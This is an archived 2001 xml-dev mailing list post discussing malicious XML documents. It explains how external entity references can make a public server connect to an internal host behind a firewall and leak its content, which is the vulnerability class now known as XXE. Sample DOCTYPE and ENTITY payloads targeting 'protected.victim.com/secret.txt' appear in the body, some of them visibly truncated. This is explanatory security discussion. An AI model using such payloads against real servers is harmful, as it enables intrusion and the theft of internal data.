OASIS Mailing List ArchivesView the OASIS mailing list archive below
or browse/search using MarkMail.


Help: OASIS Mailing Lists Help | MarkMail Help



   Re: [xml-dev] Malicious documents? (WAS: Interesting mailing list & a ra

[ Lists Home | Date Index | Thread Index ]

I wrote,
> If anyone can come up with variations on this theme I'd be extremely
> interested to hear about them.

Here's another possibility,

* Firewall penetration.

  bastion.victim.com is a publicly exposed server, protected.victim.com
  is an internal host supposedly hidden behind a firewall, but
  accessible to bastion.victim.com. A malicious client might submit a
  document of the form,

     <?xml version="1.0"?>
     <!DOCTYPE foo SYSTEM "http://protected.victim.com/victim-uri";>

  to bastion.victim.com causing it to make an unexpected network
  connection to the internal host. This on its own might be enough to
  cause trouble, eg.,

     <?xml version="1.0"?>

  But there's also the possibility of unexpected information disclosure
  if the response the public server returns to the malicious client
  contains infomation derived from the entity retrived from the
  protected host, eg., the following document might be submitted to an
  online validator which echos back the request entity annotated with
  validation error reports, but with external entities expanded,

     <?xml version="1.0"?>
     <!DOCTYPE foo [
       <!ENTITY secret SYSTEM "http://protected.victim.com/secret.txt";>

  which might result in a response like this,

     HTTP/1.1 200 OK
     Content-Type: text/plain     

     <?xml version="1.0"?>
     <!DOCTYPE foo [
       <!ENTITY secret SYSTEM "http://protected.victim.com/secret.txt";>
     <bar>... Credit card details here ...</bar>
     Validity constraint: element "bar" not permitted here.




News | XML in Industry | Calendar | XML Registry
Marketplace | Resources | MyXML.org | Sponsors | Privacy Statement

Copyright 2001 XML.org. This site is hosted by OASIS